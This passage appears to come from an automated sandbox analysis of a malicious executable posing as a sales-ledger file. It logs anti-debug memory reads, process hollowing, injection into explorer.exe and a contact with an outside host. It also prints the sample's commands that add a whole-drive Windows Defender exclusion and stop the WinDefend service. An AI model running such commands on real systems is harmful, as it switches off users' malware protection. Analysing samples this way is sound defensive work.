                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_0122B390 mov eax, dword ptr fs:[00000030h]24_2_0122B390
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_01222397 mov eax, dword ptr fs:[00000030h]24_2_01222397
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_012203E2 mov eax, dword ptr fs:[00000030h]24_2_012203E2
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_012203E2 mov eax, dword ptr fs:[00000030h]24_2_012203E2
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_012203E2 mov eax, dword ptr fs:[00000030h]24_2_012203E2
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_012203E2 mov eax, dword ptr fs:[00000030h]24_2_012203E2
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_012203E2 mov eax, dword ptr fs:[00000030h]24_2_012203E2
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_012203E2 mov eax, dword ptr fs:[00000030h]24_2_012203E2
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_0121DBE9 mov eax, dword ptr fs:[00000030h]24_2_0121DBE9
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_012753CA mov eax, dword ptr fs:[00000030h]24_2_012753CA
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_012753CA mov eax, dword ptr fs:[00000030h]24_2_012753CA
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_0121A229 mov eax, dword ptr fs:[00000030h]24_2_0121A229
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_0121A229 mov eax, dword ptr fs:[00000030h]24_2_0121A229
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_0121A229 mov eax, dword ptr fs:[00000030h]24_2_0121A229
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_0121A229 mov eax, dword ptr fs:[00000030h]24_2_0121A229
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_0121A229 mov eax, dword ptr fs:[00000030h]24_2_0121A229
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_0121A229 mov eax, dword ptr fs:[00000030h]24_2_0121A229
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_0121A229 mov eax, dword ptr fs:[00000030h]24_2_0121A229
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_0121A229 mov eax, dword ptr fs:[00000030h]24_2_0121A229
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_0121A229 mov eax, dword ptr fs:[00000030h]24_2_0121A229
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_011FAA16 mov eax, dword ptr fs:[00000030h]24_2_011FAA16
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_011FAA16 mov eax, dword ptr fs:[00000030h]24_2_011FAA16
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_01234A2C mov eax, dword ptr fs:[00000030h]24_2_01234A2C
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_01234A2C mov eax, dword ptr fs:[00000030h]24_2_01234A2C
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_011F5210 mov eax, dword ptr fs:[00000030h]24_2_011F5210
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_011F5210 mov ecx, dword ptr fs:[00000030h]24_2_011F5210
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_011F5210 mov eax, dword ptr fs:[00000030h]24_2_011F5210
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_011F5210 mov eax, dword ptr fs:[00000030h]24_2_011F5210
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_01208A0A mov eax, dword ptr fs:[00000030h]24_2_01208A0A
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_01213A1C mov eax, dword ptr fs:[00000030h]24_2_01213A1C
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_012BAA16 mov eax, dword ptr fs:[00000030h]24_2_012BAA16
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_012BAA16 mov eax, dword ptr fs:[00000030h]24_2_012BAA16
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_012AB260 mov eax, dword ptr fs:[00000030h]24_2_012AB260
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_012AB260 mov eax, dword ptr fs:[00000030h]24_2_012AB260
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_012C8A62 mov eax, dword ptr fs:[00000030h]24_2_012C8A62
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_0123927A mov eax, dword ptr fs:[00000030h]24_2_0123927A
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_011F9240 mov eax, dword ptr fs:[00000030h]24_2_011F9240
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_011F9240 mov eax, dword ptr fs:[00000030h]24_2_011F9240
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_011F9240 mov eax, dword ptr fs:[00000030h]24_2_011F9240
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_011F9240 mov eax, dword ptr fs:[00000030h]24_2_011F9240
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_012BEA55 mov eax, dword ptr fs:[00000030h]24_2_012BEA55
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_01284257 mov eax, dword ptr fs:[00000030h]24_2_01284257
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_0120AAB0 mov eax, dword ptr fs:[00000030h]24_2_0120AAB0
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_0120AAB0 mov eax, dword ptr fs:[00000030h]24_2_0120AAB0
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_0122FAB0 mov eax, dword ptr fs:[00000030h]24_2_0122FAB0
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_0122D294 mov eax, dword ptr fs:[00000030h]24_2_0122D294
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_0122D294 mov eax, dword ptr fs:[00000030h]24_2_0122D294
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_011F52A5 mov eax, dword ptr fs:[00000030h]24_2_011F52A5
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_011F52A5 mov eax, dword ptr fs:[00000030h]24_2_011F52A5
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_011F52A5 mov eax, dword ptr fs:[00000030h]24_2_011F52A5
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_011F52A5 mov eax, dword ptr fs:[00000030h]24_2_011F52A5
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_011F52A5 mov eax, dword ptr fs:[00000030h]24_2_011F52A5
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_01222AE4 mov eax, dword ptr fs:[00000030h]24_2_01222AE4
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_01222ACB mov eax, dword ptr fs:[00000030h]24_2_01222ACB
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_0127A537 mov eax, dword ptr fs:[00000030h]24_2_0127A537
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_012BE539 mov eax, dword ptr fs:[00000030h]24_2_012BE539
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_01203D34 mov eax, dword ptr fs:[00000030h]24_2_01203D34
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_01203D34 mov eax, dword ptr fs:[00000030h]24_2_01203D34
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_01203D34 mov eax, dword ptr fs:[00000030h]24_2_01203D34
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_01203D34 mov eax, dword ptr fs:[00000030h]24_2_01203D34
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_01203D34 mov eax, dword ptr fs:[00000030h]24_2_01203D34
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_01203D34 mov eax, dword ptr fs:[00000030h]24_2_01203D34
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_01203D34 mov eax, dword ptr fs:[00000030h]24_2_01203D34
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_01203D34 mov eax, dword ptr fs:[00000030h]24_2_01203D34
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_01203D34 mov eax, dword ptr fs:[00000030h]24_2_01203D34
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_01203D34 mov eax, dword ptr fs:[00000030h]24_2_01203D34
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_01203D34 mov eax, dword ptr fs:[00000030h]24_2_01203D34
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_01203D34 mov eax, dword ptr fs:[00000030h]24_2_01203D34
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_01203D34 mov eax, dword ptr fs:[00000030h]24_2_01203D34
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_012C8D34 mov eax, dword ptr fs:[00000030h]24_2_012C8D34
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_01224D3B mov eax, dword ptr fs:[00000030h]24_2_01224D3B
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_01224D3B mov eax, dword ptr fs:[00000030h]24_2_01224D3B
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_01224D3B mov eax, dword ptr fs:[00000030h]24_2_01224D3B
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_011FAD30 mov eax, dword ptr fs:[00000030h]24_2_011FAD30
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_0121C577 mov eax, dword ptr fs:[00000030h]24_2_0121C577
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_0121C577 mov eax, dword ptr fs:[00000030h]24_2_0121C577
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_01233D43 mov eax, dword ptr fs:[00000030h]24_2_01233D43
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_01273540 mov eax, dword ptr fs:[00000030h]24_2_01273540
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_012A3D40 mov eax, dword ptr fs:[00000030h]24_2_012A3D40
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_01217D50 mov eax, dword ptr fs:[00000030h]24_2_01217D50
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_012C05AC mov eax, dword ptr fs:[00000030h]24_2_012C05AC
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_012C05AC mov eax, dword ptr fs:[00000030h]24_2_012C05AC
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_012235A1 mov eax, dword ptr fs:[00000030h]24_2_012235A1
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_011F2D8A mov eax, dword ptr fs:[00000030h]24_2_011F2D8A
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_011F2D8A mov eax, dword ptr fs:[00000030h]24_2_011F2D8A
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_011F2D8A mov eax, dword ptr fs:[00000030h]24_2_011F2D8A
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_011F2D8A mov eax, dword ptr fs:[00000030h]24_2_011F2D8A
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_011F2D8A mov eax, dword ptr fs:[00000030h]24_2_011F2D8A
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_01221DB5 mov eax, dword ptr fs:[00000030h]24_2_01221DB5
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_01221DB5 mov eax, dword ptr fs:[00000030h]24_2_01221DB5
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_01221DB5 mov eax, dword ptr fs:[00000030h]24_2_01221DB5
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_01222581 mov eax, dword ptr fs:[00000030h]24_2_01222581
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_01222581 mov eax, dword ptr fs:[00000030h]24_2_01222581
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_01222581 mov eax, dword ptr fs:[00000030h]24_2_01222581
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_01222581 mov eax, dword ptr fs:[00000030h]24_2_01222581
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_0122FD9B mov eax, dword ptr fs:[00000030h]24_2_0122FD9B
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_0122FD9B mov eax, dword ptr fs:[00000030h]24_2_0122FD9B
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_0120D5E0 mov eax, dword ptr fs:[00000030h]24_2_0120D5E0
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_0120D5E0 mov eax, dword ptr fs:[00000030h]24_2_0120D5E0
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_012BFDE2 mov eax, dword ptr fs:[00000030h]24_2_012BFDE2
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_012BFDE2 mov eax, dword ptr fs:[00000030h]24_2_012BFDE2
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_012BFDE2 mov eax, dword ptr fs:[00000030h]24_2_012BFDE2
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_012BFDE2 mov eax, dword ptr fs:[00000030h]24_2_012BFDE2
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_012A8DF1 mov eax, dword ptr fs:[00000030h]24_2_012A8DF1
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_01276DC9 mov eax, dword ptr fs:[00000030h]24_2_01276DC9
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_01276DC9 mov eax, dword ptr fs:[00000030h]24_2_01276DC9
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_01276DC9 mov eax, dword ptr fs:[00000030h]24_2_01276DC9
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_01276DC9 mov ecx, dword ptr fs:[00000030h]24_2_01276DC9
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_01276DC9 mov eax, dword ptr fs:[00000030h]24_2_01276DC9
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_01276DC9 mov eax, dword ptr fs:[00000030h]24_2_01276DC9
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_0122BC2C mov eax, dword ptr fs:[00000030h]24_2_0122BC2C
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_012C740D mov eax, dword ptr fs:[00000030h]24_2_012C740D
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_012C740D mov eax, dword ptr fs:[00000030h]24_2_012C740D
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_012C740D mov eax, dword ptr fs:[00000030h]24_2_012C740D
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_012B1C06 mov eax, dword ptr fs:[00000030h]24_2_012B1C06
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_012B1C06 mov eax, dword ptr fs:[00000030h]24_2_012B1C06
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_012B1C06 mov eax, dword ptr fs:[00000030h]24_2_012B1C06
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_012B1C06 mov eax, dword ptr fs:[00000030h]24_2_012B1C06
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_012B1C06 mov eax, dword ptr fs:[00000030h]24_2_012B1C06
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_012B1C06 mov eax, dword ptr fs:[00000030h]24_2_012B1C06
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_012B1C06 mov eax, dword ptr fs:[00000030h]24_2_012B1C06
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_012B1C06 mov eax, dword ptr fs:[00000030h]24_2_012B1C06
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_012B1C06 mov eax, dword ptr fs:[00000030h]24_2_012B1C06
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_012B1C06 mov eax, dword ptr fs:[00000030h]24_2_012B1C06
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_012B1C06 mov eax, dword ptr fs:[00000030h]24_2_012B1C06
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_012B1C06 mov eax, dword ptr fs:[00000030h]24_2_012B1C06
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_012B1C06 mov eax, dword ptr fs:[00000030h]24_2_012B1C06
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_012B1C06 mov eax, dword ptr fs:[00000030h]24_2_012B1C06
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_01276C0A mov eax, dword ptr fs:[00000030h]24_2_01276C0A
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_01276C0A mov eax, dword ptr fs:[00000030h]24_2_01276C0A
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_01276C0A mov eax, dword ptr fs:[00000030h]24_2_01276C0A
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_01276C0A mov eax, dword ptr fs:[00000030h]24_2_01276C0A
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_0121746D mov eax, dword ptr fs:[00000030h]24_2_0121746D
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_0122A44B mov eax, dword ptr fs:[00000030h]24_2_0122A44B
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_0128C450 mov eax, dword ptr fs:[00000030h]24_2_0128C450
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_0128C450 mov eax, dword ptr fs:[00000030h]24_2_0128C450
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_0120849B mov eax, dword ptr fs:[00000030h]24_2_0120849B
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_012B14FB mov eax, dword ptr fs:[00000030h]24_2_012B14FB
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_01276CF0 mov eax, dword ptr fs:[00000030h]24_2_01276CF0
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_01276CF0 mov eax, dword ptr fs:[00000030h]24_2_01276CF0
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_01276CF0 mov eax, dword ptr fs:[00000030h]24_2_01276CF0
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_012C8CD6 mov eax, dword ptr fs:[00000030h]24_2_012C8CD6
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_0122E730 mov eax, dword ptr fs:[00000030h]24_2_0122E730
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_012C070D mov eax, dword ptr fs:[00000030h]24_2_012C070D
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_012C070D mov eax, dword ptr fs:[00000030h]24_2_012C070D
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_0122A70E mov eax, dword ptr fs:[00000030h]24_2_0122A70E
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_0122A70E mov eax, dword ptr fs:[00000030h]24_2_0122A70E
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_011F4F2E mov eax, dword ptr fs:[00000030h]24_2_011F4F2E
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_011F4F2E mov eax, dword ptr fs:[00000030h]24_2_011F4F2E
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_0121F716 mov eax, dword ptr fs:[00000030h]24_2_0121F716
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_0128FF10 mov eax, dword ptr fs:[00000030h]24_2_0128FF10
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_0128FF10 mov eax, dword ptr fs:[00000030h]24_2_0128FF10
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_0120FF60 mov eax, dword ptr fs:[00000030h]24_2_0120FF60
                  Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 32_2_04CEB944 mov eax, dword ptr fs:[00000030h]32_2_04CEB944
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Process token adjusted: Debug
                  Source: C:\Users\user\AppData\Local\Temp\AdvancedRun.exe Process token adjusted: Debug
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Process token adjusted: Debug
                  Source: C:\Windows\SysWOW64\cmmon32.exe Process token adjusted: Debug
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Memory allocated: page read and write | page guard

                  HIPS / PFW / Operating System Protection Evasion:

                  System process connects to network (likely due to code injection or exploit)
                  Source: C:\Windows\explorer.exe Network Connect: 185.53.179.90 80
                  Source: C:\Windows\explorer.exe Domain query: www.seniorlivingcaelderly.com
                  Adds a directory exclusion to Windows Defender
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'powershell' Add-MpPreference -ExclusionPath C:\
                  Maps a DLL or memory area into another process
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Section loaded: unknown target: C:\Windows\SysWOW64\cmmon32.exe protection: execute and read and write
                  Source: C:\Windows\SysWOW64\cmmon32.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
                  Source: C:\Windows\SysWOW64\cmmon32.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
                  Modifies the context of a thread in another process (thread injection)
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Thread register set: target process: 3388
                  Source: C:\Windows\SysWOW64\cmmon32.exe Thread register set: target process: 3388
                  Queues an APC in another process (thread injection)
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Thread APC queued: target process: C:\Windows\explorer.exe
                  Sample uses process hollowing technique
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Section unmapped: C:\Windows\SysWOW64\cmmon32.exe base address: 960000
                  Source: C:\Users\user\AppData\Local\Temp\AdvancedRun.exe Code function: 9_2_00401C26 GetCurrentProcessId,memset,memset,_snwprintf,memset,ShellExecuteExW,WaitForSingleObject,GetExitCodeProcess,GetLastError,9_2_00401C26
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Process created: C:\Users\user\AppData\Local\Temp\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\AdvancedRun.exe' /EXEFilename 'C:\Windows\System32\sc.exe' /WindowState 0 /CommandLine 'stop WinDefend' /StartDirectory '' /RunAs 8 /Run
